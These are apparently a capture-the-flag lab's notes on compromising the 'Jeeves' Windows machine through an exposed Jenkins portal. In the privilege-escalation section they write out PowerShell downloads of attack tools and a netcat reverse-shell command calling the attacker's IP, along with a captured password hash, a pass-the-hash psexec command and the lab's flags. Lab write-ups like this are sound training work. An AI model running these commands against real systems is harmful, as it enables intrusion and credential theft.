Jeeves
- not a dc
- Windows 10 Pro 10586 x64
NMAP
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-12-16T21:35:55
|_ start_date: 2025-12-16T21:05:08
|_clock-skew: mean: 4h59m59s, deviation: 0s, median: 4h59m59s
Foothold
- tried fuzzing the 80 website. no dirs, vhosts
- tried fuzzing the 50000 website. no dirs or vhosts normally
- fuzzed with
directory-mediumlist and gotaskjeeves - found a jenkins portal
- fuzzed with
- ran groovy script reverse shell payload to get a reverse shell, landed in
Administrator\.jenkins - cd kohsuke to get user.txt -
e3232272596fb47950d59c4cf1e7066a
Privesc
whoami /privshows SeImpersonateprivpowershell -Command "wget http://10.10.14.183/nc64.exe -o nc.exe"powershell -Command "wget http://10.10.14.183/PrintSpoofer.exe -o psf.exe"powershell -Command "wget http://10.10.14.183/EnableAllTokenPrivs.ps1 -o EnableAllTokenPrivs.ps1
.\psf.exe -c "C:\temp\nc.exe 10.10.14.183 9001 -e C:\Windows\System32\cmd.exe"- did not work
- found a CEH.kdbx file in kohsuke documents.
- started impacket-smbserver
- copied ceh.kdbx to our smb share.
- also got kohsuke hash
kohsuke::JEEVES:aaaaaaaaaaaaaaaa:06b88d6f342840ee660feb264a62a860:0101000000000000006dd0ecc46edc01514c7460d3c2144e00000000010010007700440059006900760051005800740003001000770044005900690076005100580074000200100050007800520045005000750049004b000400100050007800520045005000750049004b0007000800006dd0ecc46edc010600040002000000080030003000000000000000000000000030000055e8b91c5eae116497dcd994ae520d7b2635a56fc93b952d1b6c7c3d32f7ff2e0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e00310038003300000000000000000000000000 - keepass2john CEH.kdbx
moonshine1is the master password
- opening the CEH.kdbx db
- trying the above passwords for Administrator with nxc smb
- we find that
administrator:e0fb1fb85756c24235ff238cbe81fe00works (pass the hash)
- since we have SMB access, we can get a shell using psexec
impacket-psexec administrator@10.129.228.224 -hashes :e0fb1fb85756c24235ff238cbe81fe00- checking
C:\Users\Administrator\Desktop, we see hm.txt that says look deeper. - could not find the flag in any other folder.
- hint says check in Desktop itself
- tried
dir \a \s \bnothing worked dir \rshows alternate data streams. we seehm.txt:root.txt:$DATAmore < hm.txt:root.txtgive root flag - afbc5bd4b615a60648cec41c6ac92530